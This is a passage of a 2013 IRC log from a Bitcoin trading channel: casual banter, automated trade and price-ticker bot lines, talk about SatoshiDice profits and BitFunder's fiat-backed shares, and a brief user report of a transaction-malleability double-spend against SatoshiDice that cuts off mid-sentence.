laws still apply. Feb 22 05:36:55 can't argue with that Feb 22 05:37:28 because we don't want to Feb 22 05:37:53 the world, as it is, in terms of society and politics and industry is dying Feb 22 05:38:14 renewal comes soon, unless free energy intervenes. Feb 22 05:38:25 my penis is dying over this conversation Feb 22 05:38:32 time to tip clark moody Feb 22 05:38:47 then I'm going to bed. gotta put up a few more buys for when it crashes. Feb 22 05:38:50 seriously Feb 22 05:38:58 what tha fuck would we do without that site Feb 22 05:39:43 its Pump and dont dump Feb 22 05:48:36 [MPEX] [S.MPOE] 60 @ 0.00063705 = 0.0382 BTC [-] Feb 22 05:48:38 [MPEX] [S.MPOE] 4085 @ 0.00063402 = 2.59 BTC [-] Feb 22 05:48:39 [MPEX] [S.MPOE] 4321 @ 0.00063293 = 2.7349 BTC [-] Feb 22 05:48:49 [MPEX] [S.MPOE] 12800 @ 0.00063292 = 8.1014 BTC [-] Feb 22 05:48:51 [MPEX] [S.MPOE] 9784 @ 0.00063154 = 6.179 BTC [-] Feb 22 06:01:24 [MPEX] [S.MPOE] 4321 @ 0.00063187 = 2.7303 BTC [+] Feb 22 06:01:26 [MPEX] [S.MPOE] 7279 @ 0.00063154 = 4.597 BTC [-] Feb 22 06:16:46 nah Feb 22 06:17:03 we'll build a distributed decentralized society Feb 22 06:17:11 where we mine for our libraries and hospitals Feb 22 06:17:35 early adopters get more knowledge and better medical treatment Feb 22 06:18:03 yes, of society Feb 22 06:18:17 It's more of a problem that being altruistic tends to get you 10 leeches stuck on you... Feb 22 06:19:31 If there's no group in power to make rules/exclude, for one person building stuff for the community, 10 will smooch off of that work without contributing. Feb 22 06:20:19 Like people who just love working... Feb 22 06:20:27 workaholics Feb 22 06:20:46 the goal is to become a power broker Feb 22 06:20:57 looking forward to being one! Feb 22 06:21:15 Actually I think we are the early adopters Feb 22 06:21:42 [MPEX] [S.MPOE] 4321 @ 0.00064104 = 2.7699 BTC [+] Feb 22 06:21:43 [MPEX] [S.MPOE] 10674 @ 0.00064113 = 6.8434 BTC [+] Feb 22 06:21:45 [MPEX] [S.MPOE] 5525 @ 0.00064222 = 3.5483 BTC [+] Feb 22 06:27:00 anyone here watched Code Geass? Feb 22 06:27:05 I just realized something Feb 22 06:27:49 meh Feb 22 06:27:53 I was going to Feb 22 06:27:56 then I realized how retarded it was Feb 22 06:28:06 and Im the guy that likes giant robots Feb 22 06:28:23 C.C. Loved pizza Feb 22 06:28:31 and C.C. was helping lelouch with his rebellion Feb 22 06:28:39 Bitcoins, are designed as a fuck you to the feds, in short a rebellion to the feds Feb 22 06:28:48 and bitcoiners love pizza Feb 22 06:28:55 so much that hey paid 10,000 BTC for 2 pizzas Feb 22 06:29:04 Bitcoin = Code Geass rebellion!! Feb 22 06:29:13 Satoshi = zero!! Feb 22 06:29:19 http://satoshidice.com/ Feb 22 06:29:22 the chick is CC Feb 22 06:29:25 with her green hair Feb 22 06:29:33 it all makes sense now Feb 22 06:29:51 In the end we see Satoshi sacking himself for the good of everyone Feb 22 06:30:00 but not after crazy shit happens Feb 22 06:31:49 ASICs are like the new mainframes Feb 22 06:32:23 Oh, and it just happened that http://codegeass.wikia.com/wiki/Avalon Feb 22 06:32:30 !!! Feb 22 06:32:33 Fuck I knew it Feb 22 06:32:38 this thing is a whole setup Feb 22 06:32:54 Yes! Feb 22 06:32:56 Avalon is Feb 22 06:33:13 is that what i preordered? Feb 22 06:33:14 All hail zero!! Feb 22 06:33:16 Yes! Feb 22 06:33:18 scammers Feb 22 06:33:27 IT does !! Feb 22 06:33:29 Right?? Feb 22 06:33:30 Desho? Feb 22 06:34:16 BFL are those eunuchs.. who didnt deliver shit Feb 22 06:34:29 wait thats bASIC Feb 22 06:34:58 We need an ASIC company named Freja.. that'd be awesome Feb 22 06:36:43 http://en.wikipedia.org/wiki/Ben_Bernanke Feb 22 06:37:01 that's charles Feb 22 06:37:10 one of his children is satoshi Feb 22 06:37:17 ;;ticker Feb 22 06:37:18 BTCUSD ticker | Best bid: 30.04001, Best ask: 30.16900, Bid-ask spread: 0.12899, Last trade: 30.04001, 24 hour volume: 51240.83998307, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.82270 Feb 22 06:38:11 Omg.. and another thing Feb 22 06:38:18 one of the FGPAs of Avalon Feb 22 06:38:22 is called Lancelot Feb 22 06:38:26 O_O Feb 22 06:38:41 Yifu = Suzaku??? Feb 22 06:39:47 I bet someone with Geass here keep telling people to buy buy buy Feb 22 06:40:33 It sucks that I can't really watch anime Feb 22 06:40:35 coz of bitcoin Feb 22 06:40:35 fuck Feb 22 06:40:41 my priorites are backward Feb 22 06:40:42 lol Feb 22 06:41:06 usagi, watched hxh? **** BEGIN LOGGING AT Fri Feb 22 13:35:57 2013 Feb 22 13:37:49 apparently, Bowjob -- you've been right every time you said that so far Feb 22 14:00:00 anybody use yubikeys? Feb 22 14:01:20 [MPEX] [S.MPOE] 4321 @ 0.00064242 = 2.7759 BTC [+] Feb 22 14:01:22 [MPEX] [S.MPOE] 16000 @ 0.00064251 = 10.2802 BTC [+] Feb 22 14:01:24 [MPEX] [S.MPOE] 4929 @ 0.00064252 = 3.167 BTC [+] Feb 22 14:14:40 !ticker m X.IDIFF.MAR Feb 22 14:14:43 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 22 14:14:51 why the fuck is no one buying IDIFF? Feb 22 14:17:45 [MPEX] [S.MPOE] 4321 @ 0.00064161 = 2.7724 BTC [-] Feb 22 14:17:47 [MPEX] [S.MPOE] 12579 @ 0.00064196 = 8.0752 BTC [+] Feb 22 14:18:06 whats your favasset exchange? Feb 22 14:26:57 thestringpuller that's a mystery for the ages. Feb 22 14:29:03 885 Feb 22 14:39:48 [MPEX] [S.MPOE] 4321 @ 0.00063935 = 2.7626 BTC [-] Feb 22 14:39:50 [MPEX] [S.MPOE] 16000 @ 0.00063914 = 10.2262 BTC [-] Feb 22 14:39:52 [MPEX] [S.MPOE] 6251 @ 0.00063913 = 3.9952 BTC [-] Feb 22 15:11:22 ;;bc,stats Feb 22 15:11:24 Current Blocks: 222530 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1245 blocks | Next Difficulty In About: 1 week, 0 days, 16 hours, 26 minutes, and 40 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 22 15:27:40 ohh the other futures were discontinued? MUST FIX Feb 22 15:29:10 +3000 BTC profit for the last 1000 bet (2days) 2500 above EV ! Feb 22 15:29:40 S.Dice run good ! Feb 22 15:31:17 http://uncrunched.com/2013/02/21/the-department-of-homeland-security-stole-my-boat-today/ Feb 22 15:31:50 fingerling potatoes? Feb 22 15:35:28 [MPEX] [S.DICE] 1531 @ 0.00587398 = 8.9931 BTC [+] Feb 22 15:36:01 yeah, he'll get it back, I just hope it gets out there in the media more. Feb 22 15:36:06 so people are more wary. Feb 22 15:36:24 [MPEX] [S.DICE] 500 @ 0.00598363 = 2.9918 BTC [+] Feb 22 15:36:54 [MPEX] [S.DICE] 300 @ 0.0060899 = 1.827 BTC [+] Feb 22 15:50:56 ;;bc,stats Feb 22 15:50:59 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 22 15:51:08 Current Blocks: 222536 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1239 blocks | Next Difficulty In About: 1 week, 0 days, 13 hours, 19 minutes, and 1 second | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 22 15:51:48 [BTCTC] [BTC-TRADING-PT] 2 @ 0.0873 = 0.1746 BTC [-] Feb 22 15:52:49 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 22 16:07:42 ;;ticker Feb 22 16:07:43 BTCUSD ticker | Best bid: 30.61955, Best ask: 30.76200, Bid-ask spread: 0.14245, Last trade: 30.76200, 24 hour volume: 55152.61716662, 24 hour low: 29.42000, 24 hour high: 30.76200, 24 hour vwap: 30.03966 Feb 22 16:12:31 ;;bc,24hprc Feb 22 16:12:32 30.06 Feb 22 16:13:33 [BTCTC] [RSM] 2 @ 0.008 = 0.016 BTC [+] Feb 22 16:33:18 ;;asks 31.99 Feb 22 16:33:20 There are currently 7044.8875 bitcoins offered at or under 31.99 USD, worth 221886.66444 USD in total. Feb 22 16:34:12 ;;bc,stats Feb 22 16:34:15 Current Blocks: 222545 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1230 blocks | Next Difficulty In About: 1 week, 0 days, 12 hours, and 0 seconds | Next Difficulty Estimate: 3191474.41456 | Estimated Percent Change: -12.58657 Feb 22 16:34:41 why do the stats dip like that this time of day? Feb 22 16:36:15 weird Feb 22 16:36:29 [MPEX] [S.DICE] 5000 @ 0.00609 = 30.45 BTC [+] Feb 22 16:37:28 yeah. Feb 22 16:37:35 [HAVELOCK] [SDICE] 5 @ 0.68010003 = 3.4005 BTC [-] Feb 22 16:37:37 [HAVELOCK] [SDICE] 9 @ 0.6801 = 6.1209 BTC [-] Feb 22 16:37:38 [HAVELOCK] [SDICE] 10 @ 0.68 = 6.8 BTC [-] Feb 22 16:37:38 [HAVELOCK] [SDICE] 3 @ 0.68 = 2.04 BTC [-] Feb 22 16:37:40 [HAVELOCK] [SDICE] 5 @ 0.675 = 3.375 BTC [-] Feb 22 16:37:41 [HAVELOCK] [SDICE] 2 @ 0.674 = 1.348 BTC [-] Feb 22 16:37:42 [HAVELOCK] [SDICE] 2 @ 0.67 = 1.34 BTC [-] Feb 22 16:37:43 [HAVELOCK] [SDICE] 6 @ 0.665 = 3.99 BTC [-] Feb 22 16:37:44 [HAVELOCK] [SDICE] 4 @ 0.66 = 2.64 BTC [-] Feb 22 16:37:45 [HAVELOCK] [SDICE] 4 @ 0.637 = 2.548 BTC [-] Feb 22 16:37:47 ;;ticker Feb 22 16:37:48 BTCUSD ticker | Best bid: 30.77586, Best ask: 30.79999, Bid-ask spread: 0.02413, Last trade: 30.77586, 24 hour volume: 53263.39730356, 24 hour low: 29.42000, 24 hour high: 30.84000, 24 hour vwap: 30.07494 Feb 22 16:37:58 sweet. Feb 22 16:38:53 [MPEX] [S.DICE] 5000 @ 0.00609 = 30.45 BTC [+] Feb 22 16:39:18 large ask on S.DICE up Feb 22 16:39:36 [HAVELOCK] [SDICE] 31 @ 0.637 = 19.747 BTC [-] Feb 22 16:39:37 [HAVELOCK] [SDICE] 19 @ 0.62151 = 11.8087 BTC [-] Feb 22 16:39:42 DING DING DING -- Havelock now has 1,000,000 shares Feb 22 16:39:56 Thats a lot of coins Feb 22 16:40:15 http://bitbet.us/bet/255/s-dice-profit-falls-in-february/ Feb 22 16:40:19 Market Cap ฿6215.1000 (~$188006.78) Feb 22 16:40:20 indeed Feb 22 16:41:09 well done Feb 22 16:41:57 who knew running PTs can be that lucrative, there's what, like 4-5 btc on the spread right there ? Feb 22 16:42:17 plus th 5% dividend rake Feb 22 16:43:05 indeed Feb 22 16:43:47 honest money at least. Feb 22 16:51:02 @thickAsThieves : in BTC or $ ? Feb 22 16:51:45 ? Feb 22 16:51:52 if you look in $, pretty same result, no free fall. 395K to 360k still one week Feb 22 16:52:04 s.dice profit Feb 22 16:52:18 s.dice doesnt deal in USD Feb 22 16:52:25 :/ Feb 22 16:53:04 bet is in "bitcoin" category after all Feb 22 16:53:11 yep easy bet if you not correct with the btc rise Feb 22 16:53:41 anything can happen in the next week though Feb 22 16:53:50 whale can spend 10k Feb 22 16:55:13 at 30$ ? :/ Feb 22 16:55:17 no he can't Feb 22 16:55:26 check the address balances. Feb 22 16:55:42 he is dry ? Feb 22 16:55:56 Has had 3k left since Feb 4th Feb 22 16:55:59 no way he blow up ALL his coin... Feb 22 16:56:00 out of 40k Feb 22 16:56:08 doesnt mean it's all he has Feb 22 16:56:17 there is a new address though Feb 22 16:56:17 and that there aren't other whales Feb 22 16:56:18 yep it's the S.dice wallet :) Feb 22 16:56:24 that has about 3-4k too Feb 22 16:56:34 so that person could drive the profits Feb 22 16:57:13 http://blockchain.info/charts/balance?address=1Hz5FxwF5XYk1Emqf43Q2Vo5uUzqb7BhtM Feb 22 16:57:17 oops he is out too Feb 22 16:57:19 only need about 720 or so BTC profit per day to break the bet Feb 22 16:57:29 did he lose it all yesterday?? Feb 22 16:57:48 no profit yesterday i think Feb 22 16:59:34 but it's been nearly a day since doog's last report Feb 22 17:00:25 well, not nearly, but plenty of time for a whale to lose his btc Feb 22 17:01:11 nothing big today Feb 22 17:01:51 [BTCTC] [S.BBET-PT] 10 @ 0.0021 = 0.021 BTC [-] Feb 22 17:02:08 how's the small bets ? Feb 22 17:02:14 prolly a better long term indicator i'd guess Feb 22 17:02:38 [BTCTC] [S.BBET-PT] 90 @ 0.0021 = 0.189 BTC [-] Feb 22 17:02:38 oups my bad, +2K since last dooglu update Feb 22 17:03:22 i monitore only +4 bet Feb 22 17:06:47 Haha last 470 bet on s.dice : EV = 188 Result : 2134... 2K above EV. Please, a nice final week like in january Feb 22 17:10:51 [MPEX] [S.MPOE] 4321 @ 0.0006418 = 2.7732 BTC [+] Feb 22 17:10:51 [MPEX] [S.MPOE] 10421 @ 0.00064196 = 6.6899 BTC [+] Feb 22 17:10:53 [MPEX] [S.MPOE] 258 @ 0.00064252 = 0.1658 BTC [+] Feb 22 17:14:40 error4733 you know one of these days its going to go well under ev. Feb 22 17:14:41 it has to. Feb 22 17:15:31 BitFunder is now trading backed AUD/USD/CAD. https://bitfunder.com/asset/FIAT.USD for example. Feb 22 17:15:33 Have a nice day., Feb 22 17:15:35 not with small bet Feb 22 17:16:23 you can't beat house edge on long term Feb 22 17:17:30 obv with 3 whales & a bad run... it's possible Feb 22 17:19:00 listen, you can't beat house edge on INFINITE term. Feb 22 17:19:09 it's possible to beat it on a term of any arbitrary finite length Feb 22 17:21:22 sure, but more small bet mean you reduce variance i'm a math genius, i know Feb 22 17:22:28 :p Feb 22 17:26:51 hi Ukto, what's your plan with FIAT.USD? you will offer the shares yourself? Feb 22 17:28:18 I dont offer the shares Feb 22 17:28:19 you do Feb 22 17:28:28 or rather, any user Feb 22 17:28:37 any user can deposit their USD from weex into bitfunder Feb 22 17:28:47 which are auto converted to 1 share FIAT.USD per $1 USD Feb 22 17:29:08 what's the advantage over buying bitcoins directly? Feb 22 17:29:26 this is buying fiats Feb 22 17:29:29 with bitcoins Feb 22 17:29:36 not buying bitcoins Feb 22 17:29:38 :P Feb 22 17:29:49 these basicaly make a reverse market Feb 22 17:30:07 withdrawing any number of shares of FIAT.USD (or other currencies) to WeExchange automatically converts X shares to X dollars of that currency Feb 22 17:31:19 so basically like an exchange. Feb 22 17:31:26 yes, its a reverse exchange Feb 22 17:31:29 for those assets Feb 22 17:31:41 guys! only $969 to go :) Feb 22 17:31:45 ok, so you're merging bitfunder and what was it called, uex ? Feb 22 17:31:50 weex Feb 22 17:31:52 and not merging Feb 22 17:31:54 lol jk Feb 22 17:31:56 :P Feb 22 17:32:11 BF is just taking more advantage of the merchant system offered by weex Feb 22 17:32:55 i mean, selling FIAT.USD is fully equivalent to buying bitcoins, no? Feb 22 17:33:11 sure. You can look at it from that point of view. Feb 22 17:33:27 You could also say buying FIAT.USD is selling bitcoins. Feb 22 17:33:49 But in fact, you are buying USD with btc. Feb 22 17:33:56 If you follow the terminology. Feb 22 17:34:14 :D Feb 22 17:34:26 Either way, someone asked for it, i said sure why not, and did it. Feb 22 17:34:37 so it's an exchange on exchange Feb 22 17:34:46 No... it's an exchange. Feb 22 17:34:49 :) Feb 22 17:34:51 No one said it could only be 'assets' Feb 22 17:35:01 and the currencies ARE assets in this form Feb 22 17:35:06 will you also make it possible to buy shares of any stock with USD? Feb 22 17:35:12 they DO have a name.. its not liek they are done to the cent Feb 22 17:35:17 No Feb 22 17:35:30 You cannot buy shares of an asset, with shares from another asset Feb 22 17:35:51 why not just support USD within BF? Feb 22 17:35:56 directly Feb 22 17:36:15 Legal reasons. Feb 22 17:36:19 word Feb 22 17:36:27 also, BitFunder is not there to support USD, etc Feb 22 17:36:31 it is there to support BTC. Feb 22 17:37:01 word fiat scares me Feb 22 17:37:29 If asked "What do you do with mined bitcoins?" 'I can BUY USD with it.' Feb 22 17:37:33 That is an accurate statement. Feb 22 17:37:49 Rather than the previous limitation of 'I can SELL it for USD' Feb 22 17:38:43 seems like a thin court defense, but i know nothing of the laws Feb 22 17:38:55 defense for what? Feb 22 17:39:01 and what court? Feb 22 17:39:07 well you said not supporting USD for legal reasons Feb 22 17:39:12 but this isnt much different Feb 22 17:39:12 Correct. Feb 22 17:39:22 like i said, i'm no lawyer Feb 22 17:39:28 but it's effectively the same Feb 22 17:39:34 You misunderstand. Feb 22 17:39:50 BitFunder will not let you hold USD as an eWallet. Feb 22 17:39:56 to use/spend as you please Feb 22 17:40:05 you do not have USD in your account on BF Feb 22 17:40:11 but 1 FIATUSD = $1 constantly Feb 22 17:40:17 you have shares that may be traded out for USD by another entity Feb 22 17:40:38 yes Feb 22 17:40:45 we are not breaking any eWallet laws Feb 22 17:40:56 you cant spend FIATUSD can you? Feb 22 17:41:10 although i suppose i could sell 1 FIATUSD for more or less than $1 worth of BTC Feb 22 17:41:27 the market can valuate the usd aginst the BTC however it wants Feb 22 17:41:30 as it does currently. Feb 22 17:41:33 word Feb 22 17:41:51 My comment about legal reasons, was ment to be very broad, not specific. :) Feb 22 17:42:06 is this the only asset exchange that has somethng like this? Feb 22 17:42:17 so if i have a few g's in a certain currency can i float it as an asset onbf? Feb 22 17:42:21 Yes. Feb 22 17:42:23 of Feb 22 17:42:31 BitHub: you could try. Feb 22 17:42:34 I wont stop you Feb 22 17:42:55 is this kind of what this is? i've been following but a bit lost Feb 22 17:42:56 The diffrence is that people can instantly exchange the FIAT.*'s for real currency via BF/Weex Feb 22 17:43:30 for example, on BF, if you goto the transactions page Feb 22 17:43:38 ahh okey so instead of sending btc back to weex i can send these fiat.usd or buy em and it'll instantly show up as fiat on weex Feb 22 17:43:39 you will see you can withdraw AUD,CAD,USD shares Feb 22 17:43:44 yes Feb 22 17:44:05 you can deposit 'shares' from weex of any currency, or withdraw them Feb 22 17:44:28 cool Feb 22 17:44:40 only these shares or all the ones on bf? Feb 22 17:44:55 yes. Feb 22 17:45:08 for example, if you have 10 AUD in weex Feb 22 17:45:16 you can deposit it into BF for 10 FIAT.AUD shares Feb 22 17:45:18 ;;bc,convert eur Feb 22 17:45:19 1 BTC = 31.29999 U.S. dollars = 23.6941635 Euros Feb 22 17:45:26 you can then place them for sale at whatever rate per AUD you want. Feb 22 17:45:41 if I buy those 10, I can choose to withdraw them to weex, and have 10 AUD in weex. Feb 22 17:45:56 nice Feb 22 17:46:15 so when you going to hit up all the countries that have a closed exchanged? :P Feb 22 17:46:20 that would be pretty amazing Feb 22 17:46:22 now think about that, with the big project for BF I am working in. ;) Feb 22 17:46:50 [MPEX] [S.MPOE] 4321 @ 0.00063925 = 2.7622 BTC [-] Feb 22 17:46:51 [MPEX] [S.MPOE] 271 @ 0.00063913 = 0.1732 BTC [-] Feb 22 17:47:06 ;;bc,stats Feb 22 17:47:18 Current Blocks: 222554 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1221 blocks | Next Difficulty In About: 1 week, 0 days, 10 hours, 40 minutes, and 58 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Feb 22 17:58:05 [BTCTC] [RSM] 1 @ 0.00979 BTC [+] Feb 22 18:00:09 [MPEX] [S.MPOE] 4321 @ 0.00064239 = 2.7758 BTC [+] Feb 22 18:00:11 [MPEX] [S.MPOE] 36350 @ 0.00064252 = 23.3556 BTC [+] Feb 22 18:00:13 [MPEX] [S.MPOE] 13122 @ 0.00064286 = 8.4356 BTC [+] Feb 22 18:03:14 ;;asks 31.99 Feb 22 18:03:16 There are currently 5754.009 bitcoins offered at or under 31.99 USD, worth 181961.646777 USD in total. Feb 22 18:07:37 https://bitcointalk.org/index.php?topic=146009.0 Feb 22 18:10:15 Rather than the previous limitation of 'I can SELL it for USD' << this is a good point for sure. Feb 22 18:21:59 http://www.lasvegassun.com/news/2013/feb/21/online-poker-bill-moves-forward-nevada-legislature/ Feb 22 18:24:04 pretty cool. Feb 22 18:25:10 if its legal no need to use btc Feb 22 18:25:19 just stick with dat stupid dollars Feb 22 18:27:27 a job for mpoe-pr? https://bitcointalk.org/index.php?topic=145919.0 Feb 22 18:27:40 fucking retarded government Feb 22 18:27:47 make it illegal Feb 22 18:27:50 wipe out the competition Feb 22 18:27:57 and then make it legal again for the big boys Feb 22 18:28:41 that's how its always been Feb 22 18:28:53 I know. just shadey. Feb 22 18:29:02 Ukto yep exactly. Feb 22 18:29:12 [MPEX] [S.MPOE] 4321 @ 0.00063915 = 2.7618 BTC [-] Feb 22 18:29:13 [MPEX] [S.MPOE] 14179 @ 0.00063913 = 9.0622 BTC [-] Feb 22 18:29:21 big boys can be bothered to jump through all the hoops to bribe you Feb 22 18:29:27 small timers couldn't do it anyway. Feb 22 18:29:43 ThickAsThieves why ? Feb 22 18:30:06 nvm, i just started reading when i linked Feb 22 18:31:06 mpoe-pr is a "skidmark" hehe Feb 22 18:31:37 [HAVELOCK] [SDICE] 8 @ 0.686 = 5.488 BTC [+] Feb 22 18:32:25 sadly there are just 2 places in this whole economy where one can make any serious coin Feb 22 18:32:35 just had a short discussion over this Feb 22 18:38:28 ThickAsThieves ya well, one doesn't need five cents to have an opinion, Feb 22 18:38:31 beauty of the interwebs. Feb 22 18:56:14 ukto i'll scroll up and read about FIAT, but what's up with https://bitfunder.com/asset/ASIC.COOP and https://bitfunder.com/asset/Biz27B-6 Feb 22 18:56:42 what about them? Feb 22 18:57:13 who are they? Feb 22 18:57:25 ASIC.COOP is ciuciu it was a prev glbse asset Feb 22 18:57:40 that guy's a nut! Feb 22 18:58:04 I am just here to help Feb 22 18:58:11 well, i guess when mircea_popescu is the standard, being nuts isn't a disqualifier Feb 22 18:58:14 reglbsed. Feb 22 18:58:36 i am nuts now ?! Feb 22 18:58:44 you're not? Feb 22 18:58:50 .. havent you always been? Feb 22 18:58:50 ;) Feb 22 18:58:57 not that there's anything wrong with it... Feb 22 18:59:35 what about the super secret "we can't stop you from buyinf our secret not-for-you shares?" Feb 22 18:59:45 dont ask me Feb 22 18:59:50 i told him he needs to specify stuff Feb 22 18:59:53 or ppl will ignore it Feb 22 19:00:14 he does supposedly have something to back it Feb 22 19:00:19 hes just too scared to talk abou tit Feb 22 19:00:23 afraid of legal issues Feb 22 19:01:16 wat Feb 22 19:01:32 yeah, I rolled my eyes, said w/e Feb 22 19:01:41 how's it goin -assets? Feb 22 19:01:55 [MPEX] [S.MPOE] 5000 @ 0.00064293 = 3.2147 BTC [+] Feb 22 19:01:57 [MPEX] [S.MPOE] 4321 @ 0.00064294 = 2.7781 BTC [+] Feb 22 19:01:58 [MPEX] [S.MPOE] 1733 @ 0.00064311 = 1.1145 BTC [+] Feb 22 19:03:11 this is true nut: https://bitcointalk.org/index.php?topic=101771.msg1407323#msg1407323 Feb 22 19:03:16 not our mircea Feb 22 19:03:34 honestly Feb 22 19:03:36 I think were all nuts Feb 22 19:03:37 heh Feb 22 19:03:41 bitcoin... pfft Feb 22 19:03:50 In 2009 I was beaten nearly to death by a man with a tire Iron and have not been able to maintain a normal job sence which is why I fell inlove with bitcoins so much Feb 22 19:04:04 ?! Feb 22 19:04:21 just an excerpt from said url Feb 22 19:04:24 that guy is on beat-down status Feb 22 19:04:36 car accident and got beat with a tire iron!? Feb 22 19:04:58 that sux Feb 22 19:06:35 crazy stuff Feb 22 19:06:36 so, there are not yet relisted cases n the scene, ukto beware :D Feb 22 19:07:07 .. what? Feb 22 19:08:23 the MMM above Feb 22 19:08:36 mmm? Feb 22 19:09:13 the thread is about mmm glbse stuff Feb 22 19:11:01 issued by a man with 15day migraines :( Feb 22 19:29:46 ;;ticker Feb 22 19:29:47 BTCUSD ticker | Best bid: 31.11001, Best ask: 31.14856, Bid-ask spread: 0.03855, Last trade: 31.09901, 24 hour volume: 56442.79364155, 24 hour low: 29.67001, 24 hour high: 31.30000, 24 hour vwap: 30.27998 Feb 22 19:29:58 ;;bc,convert eur Feb 22 19:29:59 1 BTC = 31.09901 U.S. dollars = 23.5242133 Euros Feb 22 19:30:37 mpoe results will be very interesting Feb 22 19:31:09 [MPEX] [S.MPOE] 4321 @ 0.0006431 = 2.7788 BTC [-] Feb 22 19:31:11 [MPEX] [S.MPOE] 3267 @ 0.00064311 = 2.101 BTC [+] Feb 22 19:31:14 [MPEX] [S.MPOE] 16000 @ 0.00064312 = 10.2899 BTC [+] Feb 22 19:31:16 [MPEX] [S.MPOE] 3912 @ 0.00064314 = 2.516 BTC [+] Feb 22 19:31:23 mircea_popescu, you said maybe you'll do the report tomorrow morning instead of in the night, have you decided? Feb 22 19:32:25 iirc what i said was that i'll publish the report and then wait a day for any errors / complaints before making payments Feb 22 19:35:28 ah so! Feb 22 19:35:48 Please include the vwap used into the report. Feb 22 19:36:02 especially now it's changing wildly Feb 22 19:36:40 ;;bc,24hprc Feb 22 19:36:41 30.27 Feb 22 19:36:59 [BTCTC] [BASIC-MINING] 25 @ 0.3499 = 8.7475 BTC [-] Feb 22 19:37:01 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Feb 22 19:39:49 ;;bc,24hprc Feb 22 19:39:50 30.27 Feb 22 19:39:59 [MPEX] [S.MPOE] 2400 @ 0.00063937 = 1.5345 BTC [-] Feb 22 19:58:28 http://trilema.com/2013/least-likely-to-succeed-character-the-upseller/ Feb 22 19:58:46 i should probably start selling my own brand of napalm Feb 22 19:58:49 for customer support Feb 22 20:09:31 well,everyone has something to get angry over Feb 22 20:10:17 btw, i came up with better analogy with the NAT problem... it's like telephone from which you can make outgoing calls only Feb 22 20:10:49 i like this: Feb 22 20:10:50 The reason I take the time to type out a response like that is because I enjoy treating people I don’t know like they’re actual human beings, take them seriously and so forth. Feb 22 20:10:53 just because phone company depleted all numbers can't/doesn't Feb 22 20:10:55 ^^^ Feb 22 20:11:26 can't/doesn't make phone numbers longer Feb 22 20:11:27 the "investment" statment was a bit bizzare Feb 22 20:11:42 [BTCTC] [COGNITIVE] 3 @ 0.27 = 0.81 BTC [-] Feb 22 20:11:44 [BTCTC] [COGNITIVE] 1 @ 0.26392 BTC [-] Feb 22 20:18:08 ugh, have been sick as hell the last 2 weeks. :/ Feb 22 20:18:12 [MPEX] [S.MPOE] 2600 @ 0.00063937 = 1.6624 BTC [-] Feb 22 20:18:14 [MPEX] [S.MPOE] 4321 @ 0.00063936 = 2.7627 BTC [-] Feb 22 20:18:14 [MPEX] [S.MPOE] 4179 @ 0.00063926 = 2.6715 BTC [-] Feb 22 20:18:51 starting to feel better today thouhg. Feb 22 20:18:54 *though Feb 22 20:19:35 [MPEX] [S.MPOE] 4321 @ 0.00064301 = 2.7784 BTC [+] Feb 22 20:19:37 [MPEX] [S.MPOE] 3679 @ 0.00064314 = 2.3661 BTC [+] Feb 22 20:20:20 !ticker m s.mpoe Feb 22 20:20:22 [MPEX:S.MPOE] 1D: 0.00062729 / 0.00063605 / 0.00064314 (1284428 shares, 816.97 BTC), 7D: 0.000622 / 0.00064942 / 0.00068894 (10515301 shares, 6,828.92 BTC), 30D: 0.00059517 / 0.00066478 / 0.0007 (72318162 shares, 48,076.07 BTC) Feb 22 20:32:05 [BTCTC] [GSDPT] 100 @ 0.00591 = 0.591 BTC [-] Feb 22 20:32:07 [BTCTC] [GSDPT] 740 @ 0.0059 = 4.366 BTC [-] Feb 22 20:32:51 [BTCTC] [S.DICE-PT] 10 @ 0.00589 = 0.0589 BTC [-] Feb 22 20:32:53 [BTCTC] [S.DICE-PT] 25 @ 0.00588 = 0.147 BTC [-] Feb 22 20:34:05 so is ripple dead yet? Feb 22 20:38:06 well the new system operaters are trying to discourage calling trust lines "credit" I noticed Feb 22 20:38:38 ahh. ok. i was wondering how (or why) a system of credit would need to be established... Feb 22 20:39:12 btw, i came up with better analogy with the NAT problem... it's like telephone from which you can make outgoing calls only << pretty much the only way to use a phone. Feb 22 20:39:31 anyone know how to contact evoorhees? Feb 22 20:39:43 someone just successfully pulled off a doublespend attack on sdice Feb 22 20:39:44 you can also answer a ringing phone Feb 22 20:39:48 he idles here sometimes swhitt Feb 22 20:39:57 hm, link ? Feb 22 20:39:59 a ringing phone with NAT would require port forwards Feb 22 20:40:08 I was playing, this was my original losing bet Feb 22 20:40:18 https://blockchain.info/tx-index/55341372 Feb 22 20:40:22 258 bytes Feb 22 20:40:28 oh, mircea_popescu doesn't need to answer phones, he's got people for that Feb 22 20:40:30 then a new block came in with a txn not in the mempool Feb 22 20:40:32 https://blockchain.info/tx/3947b301d36aecb53fc0c060b7815db1b426cc71dae9e2dcb2a0064bce818cd1 Feb 22 20:40:33 haha Feb 22 20:40:42 same inputs and outputs but 1 additional byte, I believe OP_FALSE Feb 22 20:40:48 which doesn't need to be signed Feb 22 20:40:52 jurov literally. what am i to answer a phone !? "don't call us, we'll call you to an artform" Feb 22 20:40:52 so the txid changed Feb 22 20:41:04 [MPEX] [S.DICE] 185 @ 0.006 = 1.11 BTC [-] Feb 22 20:41:15 hello mircea_popescu Feb 22 20:41:27 swhitt did s.dice pay both ? Feb 22 20:41:31 jcpham heya jcpham! Feb 22 20:41:36 mircea_popescu: yes Feb 22 20:41:52 it payed my original losing bet Feb 22 20:42:02 and then it paid the attacked confirmed bet Feb 22 20:42:09 I saw something on btctalk about some new ways to try to exploit double-spends against s.dice. not sure if its 